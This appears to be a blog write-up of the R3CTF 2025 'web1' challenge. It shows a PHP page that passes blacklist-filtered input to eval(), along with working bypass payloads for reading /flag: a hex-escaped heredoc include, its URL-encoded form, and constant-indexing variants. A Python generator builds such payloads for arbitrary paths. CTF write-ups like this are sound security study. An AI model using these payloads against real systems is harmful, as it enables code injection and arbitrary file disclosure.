R3CTF-2025 web

OneZ3r0 Lv4

web1

```php
<?php
if (isset($_GET['input'])) {
    echo '<div class="output">';

    // Blacklist filter: the listed characters are stripped from the input,
    // then "();" is appended so the remainder is executed as a function call.
    // Everything else (letters, '.', '[', ']', ';', '#', '<', '\', newlines) survives.
    $filtered = str_replace(['$', '(', ')', '`', '"', "'", "+", ":", "/", "!", "?"], '', $_GET['input']);
    $cmd = $filtered . '();';

    echo '<strong>After Security Filtering:</strong> <span class="filtered">' . htmlspecialchars($cmd) . '</span>' . "\n\n";

    echo '<strong>Execution Result:</strong>' . "\n";
    echo '<div style="border-left: 3px solid #007bff; padding-left: 15px; margin-left: 10px;">';

    try {
        ob_start();
        eval($cmd);                 // the filtered user input is evaluated as PHP code
        $result = ob_get_clean();   // anything the code printed (e.g. an included file) is shown below

        if (!empty($result)) {
            echo '<span class="success">✅ Function executed successfully!</span>' . "\n";
            echo htmlspecialchars($result);
        } else {
            echo '<span class="success">✅ Function executed (no output)</span>';
        }
    } catch (Error $e) {
        echo '<span class="error">❌ Error: ' . htmlspecialchars($e->getMessage()) . '</span>';
    } catch (Exception $e) {
        echo '<span class="error">❌ Exception: ' . htmlspecialchars($e->getMessage()) . '</span>';
    }

    echo '</div>';
    echo '</div>';
}
?>
```

PHP heredoc documentation: https://www.php.net/manual/en/language.types.string.php

Heredoc syntax creates a string without using any quote character, and the body is parsed like a double-quoted string, so hex (`\x2f`) and octal (`\57`) escapes are expanded. That covers exactly the two things the filter removes from a plain `include '/flag';`: the quotes and the slash.

Payload (the newlines are part of the heredoc syntax):

```php
include <<<EOD
\x2fflag
EOD;getenv
```

After the server appends `();` this becomes `include "/flag"; getenv();`: the include prints the flag file as plain text, and the bareword `getenv` is only there to turn the appended `();` into a harmless call. Because the newlines have to survive the query string, the payload is sent fully URL-encoded:

```
%69%6e%63%6c%75%64%65%20%3c%3c%3c%45%4f%44%0a%5c%78%32%66%66%6c%61%67%0a%45%4f%44%3b%67%65%74%65%6e%76
```

Of course, built-in constants can also be used to get around the replacement.

[!Note]

These built-in constants depend on the environment PHP is running in: DIRECTORY_SEPARATOR is `/` on Linux, while PHP_BINARY (path of the running interpreter) and PHP_MANDIR (man-page directory of the build) differ per installation, so the character offsets in payload 2 and payload 3 must be checked against the target. The unquoted `flag`, `f` and `g` are barewords: PHP 7 resolves an undefined constant to its own name (with a notice/warning, which the `@` suppresses), while PHP 8 throws `Error: Undefined constant`, so these payloads need a PHP 7 target.

```php
payload1:
@include DIRECTORY_SEPARATOR.flag;#

payload2:
include PHP_BINARY[0].f.PHP_BINARY[5].PHP_BINARY[8].g;#

payload3:
include PHP_MANDIR[0].flag;#
```

In payload 2, assuming PHP_BINARY is `/usr/local/bin/php` (the usual layout of the official Docker images), offsets 0, 5 and 8 are `/`, `l` and `a`. In every payload the trailing `#` comments out the `();` the server appends.
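The following Python script is an added example (not part of the writeup or the challenge) that models the server's filter and generates both kinds of bypass shown above: the heredoc payload with hex escapes (generalised to any path, escaping every blacklisted character, not just `/`) and the built-in-constant indexing payload. The PHP_BINARY and PHP_MANDIR values used in the usage block are assumptions, and `decode_heredoc_body` is a deliberately simplified model of PHP's heredoc parsing that only expands `\xNN`.

```python
"""Payload builder for the web1 blacklist bypass (added example, not the writeup's code)."""
import re

# The character blacklist copied from the challenge's str_replace() call.
BLACKLIST = ['$', '(', ')', '`', '"', "'", "+", ":", "/", "!", "?"]


def challenge_filter(user_input: str) -> str:
    """Model of the server-side filter: every blacklisted character is dropped."""
    for ch in BLACKLIST:
        user_input = user_input.replace(ch, "")
    return user_input


def what_eval_sees(user_input: str) -> str:
    """The string the server hands to eval(): filtered input plus '();'."""
    return challenge_filter(user_input) + "();"


def heredoc_payload(path: str, marker: str = "EOD", tail: str = "getenv") -> str:
    """Build `include <<<MARKER ... MARKER;tail` with blacklisted characters hex-escaped.

    A heredoc body is parsed like a double-quoted string, so "\\x2f" expands to
    "/" while no quote or slash character appears in the request itself.  The
    trailing bareword `tail` absorbs the "();" the server appends (getenv()).
    """
    body = "".join(f"\\x{ord(c):02x}" if c in BLACKLIST else c for c in path)
    return f"include <<<{marker}\n{body}\n{marker};{tail}"


def decode_heredoc_body(payload: str) -> str:
    """Simplified model of PHP heredoc parsing: extract the body and expand \\xNN escapes."""
    m = re.search(r"<<<(\w+)\n(.*)\n\1;", payload, re.S)
    if m is None:
        raise ValueError("not a heredoc payload")
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})",
                  lambda esc: chr(int(esc.group(1), 16)), m.group(2))


def percent_encode_all(s: str) -> str:
    """Percent-encode every byte, as in the writeup's URL-encoded payload.

    Encoding everything keeps the newlines (%0a) that the heredoc syntax
    needs intact inside the query string.
    """
    return "".join(f"%{b:02x}" for b in s.encode())


def constant_index_payload(const_name: str, const_value: str, target: str) -> str:
    """Spell `target` using CONST[i] lookups for the blacklisted characters.

    Runs of allowed characters are emitted as PHP barewords (PHP 7 resolves an
    undefined constant to its own name; assumed to form valid identifiers),
    and each blacklisted character is fetched by offset from a built-in
    constant whose value is known for the target, e.g. PHP_BINARY[0] for '/'.
    The trailing '#' comments out the "();" the server appends.
    """
    parts, run = [], ""
    for c in target:
        if c in BLACKLIST:
            if run:
                parts.append(run)
                run = ""
            if c not in const_value:
                raise ValueError(f"{c!r} not present in the value of {const_name}")
            parts.append(f"{const_name}[{const_value.index(c)}]")
        else:
            run += c
    if run:
        parts.append(run)
    return "include " + ".".join(parts) + ";#"


if __name__ == "__main__":
    p = heredoc_payload("/flag")
    print(p)
    print(percent_encode_all(p))
    # Assumed interpreter path; check the real value on the target first.
    print(constant_index_payload("PHP_BINARY", "/usr/local/bin/php", "/flag"))
```

Both generators check themselves against the filter model: a payload is only useful if `challenge_filter` returns it unchanged, which is what `what_eval_sees` shows. The `percent_encode_all` output for `/flag` is byte-for-byte the encoded string from the writeup.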
  • Title: R3CTF-2025 web
  • Author: OneZ3r0
  • Created: 2025-07-05 10:21:13
  • Updated: 2026-03-01 11:33:36
  • Link: https://blog.onez3r0.top/2025/07/05/r3ctf-2025/
  • License: This article is licensed under CC BY-NC-SA 4.0.